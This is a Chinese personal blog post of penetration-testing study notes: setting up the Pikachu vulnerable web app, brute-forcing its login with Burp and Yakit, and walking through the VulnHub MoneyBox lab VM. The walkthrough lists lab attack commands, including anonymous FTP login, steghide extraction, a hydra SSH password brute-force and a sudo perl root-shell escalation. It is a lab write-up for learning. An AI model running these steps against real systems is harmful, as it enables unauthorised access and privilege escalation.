<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="author" content="明 尘">
    
    
    
    
    
    
    <title>virtual和pikachu | 文心雕龙</title>
    <link href="http://example.com" rel="prefetch" />

    
<link rel="stylesheet" href="/css/bootstrap.min.css">
<link rel="stylesheet" href="/css/aos.css">
<link rel="stylesheet" href="/css/style.css">

    
<script src="/js/jquery.min.js"></script>

    
<script src="/js/bootstrap.min.js"></script>

    
<script src="/js/aos.js"></script>

    
<script src="/js/highslide/highslide-full.min.js"></script>

    
<link rel="stylesheet" href="/js/highslide/highslide.css">

    <style type="text/css">
        @media (max-width: 768px) {
            body {
                background-color: #f0f0f0;
                background: url('/imgs/xsbg.gif');
                background-attachment: fixed;
            }
        }
    </style>
    
    <!--<script type="text/javascript">
      if (document.images) {
        var avatar = new Image();
        avatar.src = '/imgs/avatar.jpg'
        var previews = 'preview1.jpg,preview2.jpg,preview3.jpg,preview4.jpg,preview5.jpg,preview6.jpg,preview7.jpg'.split(',')
        var previewsPreLoad = []
        for(var i = 0; i < length; i++) {
          previewsPreLoad.push(new Image())
          previewsPreLoad[previewsPreLoad.length - 1].src = '/imgs/preview' + previews[i]
        }
      }
    </script>-->
<meta name="generator" content="Hexo 7.0.0"></head>
<body>
    <!-- 背景轮播图功能 -->
    <section class="hidden-xs">
    <ul class="cb-slideshow">
        <li><span>天若</span></li>
        <li><span>有情</span></li>
        <li><span>天亦老</span></li>
        <li><span>我为</span></li>
        <li><span>长者</span></li>
        <li><span>续一秒</span></li>
    </ul>
</section>
    <!-- 欧尼酱功能, 谁用谁知道 -->
    
    <header class="navbar navbar-inverse" id="gal-header">
    <div class="container">
        <div class="navbar-header">
            <button type="button" class="navbar-toggle collapsed"
                    data-toggle="collapse" data-target=".bs-navbar-collapse"
                    aria-expanded="false">
                <span class="fa fa-lg fa-reorder"></span>
            </button>
            <a href="http://example.com">
                
                <style>
                    #gal-header .navbar-brand {
                        height: 54px;
                        line-height: 24px;
                        font-size: 28px;
                        opacity: 1;
                        background-color: rgba(0,0,0,0);
                        text-shadow: 0 0 5px #fff,0 0 10px #fff,0 0 15px #fff,0 0 20px #228DFF,0 0 35px #228DFF,0 0 40px #228DFF,0 0 50px #228DFF,0 0 75px #228DFF;
                    }
                </style>
                <!-- 这里使用文字(navbar_text or config.title) -->
                <div class="navbar-brand">文心雕龙</div>
                
            </a>
        </div>
        <div class="collapse navbar-collapse bs-navbar-collapse">
            <ul class="nav navbar-nav" id="menu-gal">
                
                
                <li class="">
                    <a href="/">
                        <i class="fa fa-home"></i>首页
                    </a>
                </li>
                
                
                
                <li class="">
                    <a href="/archives">
                        <i class="fa fa-archive"></i>归档
                    </a>
                </li>
                
                
                
                
                <li class="dropdown">
                    <!-- TODO 添加hover dropdown效果 -->
                    <a href="#" class="dropdown-toggle" data-toggle="dropdown"
                       aria-haspopup="true" aria-expanded="false" data-hover="dropdown">
                        <i class="fa fa-list"></i>分类
                    </a>
                    <ul class="dropdown-menu">
                        
                        
                        <li>
                            <a href="/categories/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/">网络安全</a>
                        </li>
                        
                        <li>
                            <a href="/categories/web%E5%89%8D%E7%AB%AF/">web前端</a>
                        </li>
                        
                        <li>
                            <a href="/categories/php/">php</a>
                        </li>
                        
                        
                        <li>
                            <a href="/categories">...</a>
                        </li>
                        
                        
                    </ul>
                </li>
                
                
                
                
                
                <li class="dropdown">
                    <!-- TODO 添加hover dropdown效果 -->
                    <a href="#" class="dropdown-toggle" data-toggle="dropdown"
                       aria-haspopup="true" aria-expanded="false" data-hover="dropdown">
                        <i class="fa fa-tags"></i>标签
                    </a>
                    <ul class="dropdown-menu">
                        
                        
                        <li>
                            <a href="/tags/Linux/">Linux</a>
                        </li>
                        
                        <li>
                            <a href="/tags/%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/">基础知识</a>
                        </li>
                        
                        <li>
                            <a href="/tags/DNS%E5%9F%9F%E5%90%8D%E8%A7%A3%E6%9E%90/">DNS域名解析</a>
                        </li>
                        
                        
                        <li>
                            <a href="/tags">...</a>
                        </li>
                        
                        
                    </ul>
                </li>
                
                
                
                
                <li class="">
                    <a href="/about">
                        <i class="fa fa-user"></i>关于我
                    </a>
                </li>
                
                
            </ul>
        </div>
    </div>
</header>
    <div id="gal-body">
        <div class="container">
            <div class="row">
                <div class="col-md-8 gal-right" id="mainstay">
                    
<article class="article well article-body" id="article">
    <div class="breadcrumb">
        <i class="fa fa-home"></i>
        <a href="http://example.com">文心雕龙</a>
        >
        <span>virtual和pikachu</span>
    </div>
    <!-- 大型设备详细文章 -->
    <div class="hidden-xs">
        <div class="title-article">
            <h1>
                <a href="/2024/01/04/virtual%E5%92%8Cpicachu/">virtual和pikachu</a>
            </h1>
        </div>
        <div class="tag-article">
            
            <span class="label label-gal">
                <i class="fa fa-tags"></i>
                
                <a href="/tags/pikachu/">pikachu</a>, 
                
                <a href="/tags/virtrualbox/">virtrualbox</a>, 
                
                <a href="/tags/%E5%B0%8F%E7%B1%B3%E8%8C%83%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F/">小米范端口扫描</a>
                
            </span>
            
            <span class="label label-gal">
                <i class="fa fa-calendar"></i> 2024-01-04
            </span>
            
        </div>
    </div>
    <!-- 小型设备详细文章 -->
    <div class="visible-xs">
        <center>
            <div class="title-article">
                <h4>
                    <a href="/2024/01/04/virtual%E5%92%8Cpicachu/">virtual和pikachu</a>
                </h4>
            </div>
            <p>
                <i class="fa fa-calendar"></i> 2024-01-04
            </p>
            <p>
                
                <i class="fa fa-tags"></i>
                
                <a href="/tags/pikachu/">pikachu</a>, 
                
                <a href="/tags/virtrualbox/">virtrualbox</a>, 
                
                <a href="/tags/%E5%B0%8F%E7%B1%B3%E8%8C%83%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F/">小米范端口扫描</a>
                
                
                
            </p>
        </center>
    </div>
    <div class="content-article">
        <h1><span id="pikachu">pikachu</span></h1><p>pikachu是一个漏洞练习平台。其中包含了常见的web安全漏洞，</p>
<p>Burt Force(暴力破解漏洞)<br>XSS(跨站脚本漏洞)<br>CSRF(跨站请求伪造)<br>SQL-Inject(SQL注入漏洞)<br>RCE(远程命令&#x2F;代码执行)<br>Files Inclusion(文件包含漏洞)<br>Unsafe file downloads(不安全的文件下载)<br>Unsafe file uploads(不安全的文件上传)<br>Over Permisson(越权漏洞)<br>..&#x2F;..&#x2F;..&#x2F;(目录遍历)<br>I can see your ABC(敏感信息泄露)<br>PHP反序列化漏洞<br>XXE(XML External Entity attack)<br>不安全的URL重定向<br>SSRF(Server-Side Request Forgery)</p>
<h4><span id="下载pikachu">下载pikachu，</span></h4><p>github地址：<a target="_blank" rel="noopener" href="https://github.com/zhuifengshaonianhanlu/pikachu">https://github.com/zhuifengshaonianhanlu/pikachu</a></p>
<p>比较小只有几兆，然后将下载好的压缩包解压到你安装phpstudy目录中的www文件夹下。</p>
<p>打开网站根目录www,进入C:\phpstudy_pro\WWW\pikachu-master\inc,</p>
<p>配置config.inc.php文件</p>
<p>define(‘DBPW’, ‘root’);&#x2F;&#x2F;将root修改为连接mysql的密码，如果改了还是连接不上，请先手动连接下你的数据库，确保数据库服务没问题在说！</p>
<p>phpstudy打开网站，进入pikachu,</p>
<p>单击红色的初始化之后就可以进行学习之旅了。</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240104214802518.png" alt="image-20240104214802518"></p>
<p>​	“暴力破解”是一攻击具手段，在web攻击中，一般会使用这种手段对应用系统的认证信息进行获取。 其过程就是使用大量的认证信息在认证接口进行尝试登录，直到得到正确的结果。 为了提高效率，暴力破解一般会使用带有字典的工具来进行自动化操作。<br>​	理论上来说，大多数系统都是可以被暴力破解的，只要攻击者有足够强大的计算能力和时间，所以断定一个系统是否存在暴力破解漏洞，其条件也不是绝对的。 我们说一个web应用系统存在暴力破解漏洞，一般是指该web应用系统没有采用或者采用了比较弱的认证安全策略，导致其被暴力破解的“可能性”变的比较高</p>
<h1><span id="bp暴力破解">bp暴力破解</span></h1><p>打开bp,打开内嵌浏览器搜索pikachu</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240104215918036.png" alt="image-20240104215918036"></p>
<p>Burp抓包，可以开启拦截。</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240104220245893.png" alt="image-20240104220245893"></p>
<p>右键发送到Intruder</p>
<p>选择攻击类型多个Payload集合</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240104220642376.png" alt="image-20240104220642376"></p>
<p>配置payload的插入位置</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240104220826330.png" alt="image-20240104220826330"></p>
<p>可以用自带的字典，也可以自己添加配置。</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240104221055810.png" alt="image-20240104221055810"></p>
<p>然后开始攻击</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240104221330125.png" alt="image-20240104221330125"></p>
<p>破解结果。</p>
<h1><span id="yakit暴力破解">yakit暴力破解</span></h1><p>打开网站，yakit抓包，</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240104221646203.png"></p>
<p>在要攻击的位置插入字k典，插入模糊测试字典标签，可以</p>
<p>扩充一些自己觉得可能的用户和密码。</p>
<p>发送请求</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240104222054864.png" alt="image-20240104222054864"></p>
<p>破解结果</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240104222140497.png" alt="image-20240104222140497"></p>
<h1><span id="virtrualbox">virtrualbox</span></h1><h4><span id="下载">下载</span></h4><p>VirtualBox官网地址如下：<a target="_blank" rel="noopener" href="https://www.virtualbox.org/">https://www.virtualbox.org/</a></p>
<p>镜像文件下载：</p>
<p>ubuntu官网地址如下：<a target="_blank" rel="noopener" href="https://ubuntu.com/">https://ubuntu.com/</a></p>
<p>windows官网地址如下：<a target="_blank" rel="noopener" href="https://www.microsoft.com/zh-cn/">https://www.microsoft.com/zh-cn/</a></p>
<p>阿里官网镜像地址如下：<a target="_blank" rel="noopener" href="https://developer.aliyun.com/mirror/">https://developer.aliyun.com/mirror/</a></p>
<p>你可以在Downloads中找到合适自己当前电脑系统版本的软件安装包下载，下载完成后默认安装即可。</p>
<h4><span id="安装">安装</span></h4><p>然后，我们双击打开安装包，开始安装，点击【下一步】按钮。</p>
<p>选择安装路径，自定义或默认，个人建议自定义。</p>
<p>之后出现的默认就行了，出现安装界面就点安装即可。</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240104222859669.png" alt="image-20240104222859669"></p>
<h5><span id="usb设备选1">usb设备选1</span></h5><p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240104223318503.png" alt="image-20240104223318503"></p>
<h5><span id="网络选仅主机网络">网络选仅主机网络</span></h5><p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240104223717285.png" alt="image-20240104223717285"></p>
<h4><span id="启动">启动</span></h4><p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240105145500538.png" alt="image-20240105145500538"></p>
<h4><span id="下载moneyboxova">下载MoneyBox.ova</span></h4><p>​	这是vulnhub上的一个简单靶场，网上冲浪的时候发现就下载下来做了一下，发点靶场的渗透过程，就当是学习笔记了。<br>靶场地址<a target="_blank" rel="noopener" href="http://www.vulnhub.com/entry/moneybox-1,653/#download">http://www.vulnhub.com/entry/moneybox-1,653/#download</a><br>​	如果VMware里配置靶场环境有问题的话就下个Virtualbox，把靶机的ova文件导入到Virtualbox里。<br>Virtualbox的下载路径<a target="_blank" rel="noopener" href="https://www.virtualbox.org/">https://www.virtualbox.org/</a></p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240104223452644.png" alt="image-20240104223452644"></p>
<h4><span id="虚拟网络编辑器">虚拟网络编辑器</span></h4><p>桥接模式，</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240104224239060.png" alt="image-20240104224239060"></p>
<h1><span id="vulnhub-moneybox">vulnhub-MONEYBOX</span></h1><h4><span id="查看ip地址">查看IP地址</span></h4><p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240105090942863.png" alt="image-20240105090942863"></p>
<h4><span id="命令">命令</span></h4><h5><span id="关闭重启">关闭重启</span></h5><p>ifdown eth0<br>ifup eth0</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240105103349003.png" alt="image-20240105103349003"></p>
<h5><span id="网络扫描">网络扫描</span></h5><p>arp-scan -l -i etho</p>
<p>执行 ARP 主机发现并列出与本地网络连接的设备。<code>-l</code>选项表示进行局域网扫描，<code>-i eth0</code>指定要扫描的网络接口。通过这个命令，你可以列出当前局域网上的设备，并且获取这些设备的IP地址和MAC地址等信息。</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240105103857144.png" alt="image-20240105103857144"></p>
<p>nmap -p 1-10000 192.168.56.101</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240105103737391.png" alt="image-20240105103737391"></p>
<h5><span id="网络搜索19216856101">网络搜索192.168.56.101</span></h5><p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240105142355990.png" alt="image-20240105142355990"></p>
<h5><span id="端口扫描和目录枚举">端口扫描和目录枚举</span></h5><p><code>nmap -p 21,22,80 -sC 192.168.56.101</code>: 这个命令使用了 nmap 工具，它针对指定的 IP 地址（这里是 192.168.56.101）执行端口扫描。<code>-p 21,22,80</code> 指定了要扫描的端口列表（在这种情况下是21、22和80端口）。通过执行这个命令，你可以确定目标主机上这些特定端口的状态（开放、关闭或过滤）。<code>-sC</code>：启用默认脚本扫描。这将运行一组默认脚本来探测目标主机可能存在的安全漏洞或弱点。</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240105104609963.png" alt="image-20240105104609963"></p>
<p>​	(此处可发现Anonymous账号)（这是一个使用 nmap 工具进行端口扫描和脚本扫描的命令。具体来说，该命令指定了要扫描的端口（21、22和80），并启用了默认的脚本扫描。nmap 是一个常用的网络扫描工具，用于发现和识别目标主机上开放的端口和提供的服务。通过指定不同的扫描选项和参数，可以对目标主机进行多种类型的扫描，包括端口扫描、操作系统识别、服务和版本识别等。在你提供的命令中，-p 21,22,80 参数指定了要扫描的端口，即 21、22 和 80。-sC 参数启用了默认的脚本扫描，这将运行一系列内置的脚本来探测和识别目标主机上的服务。192.168.56.101 是目标主机的 IP 地址，这是你要对其进行扫描的目标。）</p>
<p><strong>发现ftp拥有允许匿名ftp登录的漏洞，Anonymous:Anonymous登录</strong></p>
<p>dirsearch -u “<a target="_blank" rel="noopener" href="http://192.168.56.101/">http://192.168.56.101</a>“ -x 403,404,401(查出blogs目录，查看页面得到S3cr3t-T3xt)</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240105104749767.png" alt="image-20240105104749767"></p>
<p>打开view-source:<a target="_blank" rel="noopener" href="http://192.168.56.101/blogs/">http://192.168.56.101/blogs/</a></p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240105151157244.png" alt="image-20240105151157244"></p>
<h5><span id="ftp命令">FTP命令</span></h5><p>通常需要指定用户名和密码来进行连接</p>
<p>ftp 192.168.56.101</p>
<p>Anonymous:Anonymous登录</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240105150042211.png" alt="image-20240105150042211"></p>
<p>ls<br>get trytofind.jpg<br>exit</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240105150248937.png" alt="image-20240105150248937"></p>
<p>ls<br>strings trytofind.jpg</p>
<p>apt install steghide</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240105150516549.png" alt="image-20240105150516549"></p>
<p>steghide extract -sf trytofind.jpg</p>
<p>打开view-source:<a target="_blank" rel="noopener" href="http://192.168.56.101/S3cr3t-T3xt/">http://192.168.56.101/S3cr3t-T3xt/</a></p>
<p>密钥3xtr4ctd4t4</p>
<p>cat data.txt</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240105152111009.png" alt="image-20240105152111009"></p>
<p>hydra -l renu -P &#x2F;usr&#x2F;share&#x2F;wordlists&#x2F;Passwords&#x2F;darkweb2017-top10000.txt ssh:&#x2F;&#x2F;192.168.56.101<br>ssh <a href="mailto:&#114;&#x65;&#110;&#117;&#64;&#x31;&#57;&#x32;&#46;&#x31;&#x36;&#x38;&#46;&#53;&#54;&#46;&#x31;&#48;&#x31;">&#114;&#x65;&#110;&#117;&#64;&#x31;&#57;&#x32;&#46;&#x31;&#x36;&#x38;&#46;&#53;&#54;&#46;&#x31;&#48;&#x31;</a></p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240105154904278.png" alt="image-20240105154904278"></p>
<p>ls<br>cat user1.txt<br>ls -al</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240105154814358.png" alt="image-20240105154814358"></p>
<p>cat .bash_history<br>ssh <a href="mailto:&#x6c;&#105;&#x6c;&#x79;&#64;&#49;&#x39;&#50;&#x2e;&#x31;&#x36;&#x38;&#x2e;&#53;&#54;&#46;&#49;&#x30;&#x31;">&#x6c;&#105;&#x6c;&#x79;&#64;&#49;&#x39;&#50;&#x2e;&#x31;&#x36;&#x38;&#x2e;&#53;&#54;&#46;&#49;&#x30;&#x31;</a></p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240105155018181.png" alt="image-20240105155018181"></p>
<p>ls -al<br>cat user2.txt<br>sudo perl -e ‘exec”&#x2F;bin&#x2F;sh”;’<br>cd &#x2F;root<br>ls -al<br>cat .root.txt</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240105155253164.png" alt="image-20240105155253164"></p>
<h1><span id="小米范端口扫描">小米范端口扫描</span></h1><h4><span id="工作原理"><strong>工作原理：</strong></span></h4><blockquote>
<p>快速端口扫描。 </p>
<p>对开放的端口快速识别http&#x2F;https。 </p>
<p>如果识别到为http&#x2F;https，则抓取首页title、Server头，响应头。</p>
<p> 如果端口非http&#x2F;https，则通过socket方式抓取其banner信息。</p>
</blockquote>
<h4><span id="功能及特性"><strong>功能及特性：</strong></span></h4><p>1、工具内置浏览器插件，另外针对开放端口支持右键使用系统默认浏览器打开。</p>
<p>2、支持数据的导出、导入。</p>
<p>3、支持多种ip格式：</p>
<blockquote>
<p>192.168.0.0&#x2F;24   192.168.1.1-123 192.168.1.123 <a target="_blank" rel="noopener" href="http://www.baidu.com/">www.baidu.com</a></p>
</blockquote>
<p>4、支持灵活的端口格式：</p>
<blockquote>
<p>1-1024,8080,8000,8000-9000</p>
</blockquote>
<p>5、自动识别http&#x2F;https，非http&#x2F;https自动抓取banner。</p>
<p>6、支持自定义超时、线程数。</p>
<p>7、支持实时任务创建，新建的任务会自动放入到任务队列。</p>
<p>8、支持一键提取所有的http或https端口的URL。</p>
<h4><span id="下载">下载</span></h4><p>相关下载链接：<a target="_blank" rel="noopener" href="https://download.csdn.net/download/qq_37113223/14809786?utm_source=bbsseo">&#x2F;&#x2F;download.csdn.net&#x2F;download&#x2F;qq_37113223&#x2F;14809786?utm_source&#x3D;bbsseo</a></p>
<p>文件名web finder，请使用java1.8运行</p>
<p>改名成web_finder_2.9.jar，java -jar web_finder_2.9.jar</p>
<p>在java1.8的bin目录cmd,运行java -jar web_finder_2.9.jar</p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240105160845092.png" alt="image-20240105160845092"></p>
<h4><span id="扫描">扫描</span></h4><p>新建扫描 输入域名，例如<a target="_blank" rel="noopener" href="http://www.baidu.com/">www.baidu.com</a></p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240105161135837.png" alt="image-20240105161135837"></p>

    </div>
</article>


                </div>
                <aside class="col-md-4 gal-left" id="sidebar">
    <!-- 此为sidebar的搜索框, 非搜索结果页面 -->
<aside id="sidebar-search">
    <div class="search hidden-xs" data-aos="fade-up" data-aos-duration="2000">
        <form class="form-inline clearfix" id="search-form" method="get"
              action="/search/index.html">
            <input type="text" name="s" class="form-control" id="searchInput" placeholder="搜索文章~" autocomplete="off">
            <button class="btn btn-danger btn-gal" type="submit">
                <i class="fa fa-search"></i>
            </button>
        </form>
    </div>
</aside>
    <aside id="sidebar-author">
    <div class="panel panel-gal" data-aos="flip-right" data-aos-duration="3000">
        <div class="panel-heading" style="text-align: center">
            <i class="fa fa-quote-left"></i>
            明 尘
            <i class="fa fa-quote-right"></i>
        </div>
        <div class="author-panel text-center">
            <img src="/imgs/avatar.jpg" width="140" height="140"
                 alt="个人头像" class="author-image">
            <p class="author-description"></p>
        </div>
    </div>
</aside>
    
    <aside id="sidebar-recent_comments">
    <div class="panel panel-gal recent hidden-xs" data-aos="fade-up" data-aos-duration="2000">
        <div class="panel-heading">
            <i class="fa fa-comments"></i>
            最新评论
            <i class="fa fa-times-circle panel-remove"></i>
            <i class="fa fa-chevron-circle-up panel-toggle"></i>
        </div>
        <ul class="list-group list-group-flush"></ul>
    </div>
</aside>
    
    <!-- 要配置好leancloud才能开启此小工具 -->
    
    
    <aside id="sidebar-recent_posts">
    <div class="panel panel-gal recent hidden-xs" data-aos="fade-up" data-aos-duration="2000">
        <div class="panel-heading">
            <i class="fa fa-refresh"></i>
            近期文章
            <i class="fa fa-times-circle panel-remove"></i>
            <i class="fa fa-chevron-circle-up panel-toggle"></i>
        </div>
        <ul class="list-group list-group-flush">
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2024/01/25/easy-cloudantivirus%E5%92%8CMoriartyCory%20160449/">easy_cloudantivirus和MoriartyCory</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2024/01/25/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/">文件包含</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2024/01/23/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/">权限维持</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2024/01/21/webshall%E5%85%8D%E6%9D%80/">webshall免杀</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2024/01/19/beef/">beef</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2024/01/16/xss/">xss</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2024/01/12/%E9%9D%B6%E6%9C%BA%E7%BB%83%E4%B9%A0/">靶机练习</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2024/01/09/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/">文件上传漏洞</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2024/01/08/sqli%E9%80%9A%E5%85%B3/">sqli通关</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2024/01/08/tg%E6%B3%A8%E5%86%8C%E5%92%8C%E6%B0%B8%E6%81%92%E4%B9%8B%E9%BB%91/">tg注册和永恒之黑</a>
                </span>
            </li>
            
        </ul>
    </div>
</aside>
    
    
    <aside id="sidebar-rand_posts">
    <div class="panel panel-gal recent hidden-xs" data-aos="fade-up" data-aos-duration="2000">
        <div class="panel-heading">
            <i class="fa fa-refresh"></i>
            随机文章
            <i class="fa fa-times-circle panel-remove"></i>
            <i class="fa fa-chevron-circle-up panel-toggle"></i>
        </div>
        <ul class="list-group list-group-flush">
            
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/12/02/Linux%E5%91%BD%E4%BB%A4/">Linux命令</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/12/13/php%E5%AD%A6%E4%B9%A01/">php学习1</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/12/06/python%E5%AD%A6%E4%B9%A0/">python学习</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/12/09/python%E5%AD%A6%E4%B9%A01/">python列表元组</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2024/01/08/sqli%E9%80%9A%E5%85%B3/">sqli通关</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/12/06/linux%E5%91%BD%E4%BB%A4%E8%A1%A5%E5%85%85/">linux命令补充</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/12/12/php%E5%AD%A6%E4%B9%A0/">php学习</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2024/01/02/%E6%B8%97%E9%80%8F%E5%92%8C%E9%9D%B6%E6%9C%BA/">渗透和靶机</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2024/01/09/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/">文件上传漏洞</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2024/01/21/webshall%E5%85%8D%E6%9D%80/">webshall免杀</a>
                </span>
            </li>
            
        </ul>
    </div>
</aside>
    
    
    <aside id="gal-sets">
        <div class="panel panel-gal hidden-xs" data-aos="fade-up" data-aos-duration="2000">
            <ul class="nav nav-pills pills-gal">

                
                <li>
                    <a href="/2024/01/04/virtual%E5%92%8Cpicachu/index.html#sidebar-tags" data-toggle="tab" id="tags-tab">热门标签</a>
                </li>
                
                
                <li>
                    <a href="/2024/01/04/virtual%E5%92%8Cpicachu/index.html#sidebar-friend-links" data-toggle="tab" id="friend-links-tab">友情链接</a>
                </li>
                
                
                <li>
                    <a href="/2024/01/04/virtual%E5%92%8Cpicachu/index.html#sidebar-links" data-toggle="tab" id="links-tab">个人链接</a>
                </li>
                
            </ul>
            <div class="tab-content">
                
                <div class="cloud-tags tab-pane nav bs-sidenav fade" id="sidebar-tags">
    
    <a href="/tags/Linux/" style="font-size: 13.162893590668737px;" class="tag-cloud-link">Linux</a>
    
    <a href="/tags/%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/" style="font-size: 19.52863334857752px;" class="tag-cloud-link">基础知识</a>
    
    <a href="/tags/DNS%E5%9F%9F%E5%90%8D%E8%A7%A3%E6%9E%90/" style="font-size: 19.316457868071904px;" class="tag-cloud-link">DNS域名解析</a>
    
    <a href="/tags/HTML/" style="font-size: 18.043140159126775px;" class="tag-cloud-link">HTML</a>
    
    <a href="/tags/CSS/" style="font-size: 14.54630614380962px;" class="tag-cloud-link">CSS</a>
    
    <a href="/tags/php/" style="font-size: 14.98824279539227px;" class="tag-cloud-link">php</a>
    
    <a href="/tags/php%E5%87%BD%E6%95%B0/" style="font-size: 16.709961872837905px;" class="tag-cloud-link">php函数</a>
    
    <a href="/tags/%E7%AE%80%E5%8D%95%E7%BD%91%E7%AB%99%E5%8A%9F%E8%83%BD%E5%AE%9E%E7%8E%B0/" style="font-size: 15.91608645848654px;" class="tag-cloud-link">简单网站功能实现</a>
    
    <a href="/tags/html/" style="font-size: 13.786349413478444px;" class="tag-cloud-link">html</a>
    
    <a href="/tags/postman/" style="font-size: 16.558656303311018px;" class="tag-cloud-link">postman</a>
    
    <a href="/tags/%E6%96%87%E4%BB%B6%E6%93%8D%E4%BD%9C/" style="font-size: 10.730455829886395px;" class="tag-cloud-link">文件操作</a>
    
    <a href="/tags/python/" style="font-size: 18.315959427816196px;" class="tag-cloud-link">python</a>
    
    <a href="/tags/%E5%8F%98%E9%87%8F/" style="font-size: 8.59071528939447px;" class="tag-cloud-link">变量</a>
    
    <a href="/tags/%E5%AD%97%E7%AC%A6%E4%B8%B2/" style="font-size: 12.889164526606713px;" class="tag-cloud-link">字符串</a>
    
    <a href="/tags/%E5%88%97%E8%A1%A8/" style="font-size: 19.071298410580177px;" class="tag-cloud-link">列表</a>
    
    <a href="/tags/%E5%85%83%E7%BB%84/" style="font-size: 9.35182132201595px;" class="tag-cloud-link">元组</a>
    
    <a href="/tags/if%E6%9D%A1%E4%BB%B6%E5%88%A4%E6%96%AD/" style="font-size: 19.65874867347744px;" class="tag-cloud-link">if条件判断</a>
    
    <a href="/tags/%E5%BE%AA%E7%8E%AF%E8%AF%AD%E5%8F%A5/" style="font-size: 18.87727458245955px;" class="tag-cloud-link">循环语句</a>
    
    <a href="/tags/%E5%AD%A6%E4%B9%A0/" style="font-size: 11.898321529579071px;" class="tag-cloud-link">学习</a>
    
    <a href="/tags/PHP/" style="font-size: 11.994986434229766px;" class="tag-cloud-link">PHP</a>
    
    <a href="/tags/Navicat/" style="font-size: 19.79352711259563px;" class="tag-cloud-link">Navicat</a>
    
    <a href="/tags/%E5%AE%89%E8%A3%85/" style="font-size: 14.579809384405255px;" class="tag-cloud-link">安装</a>
    
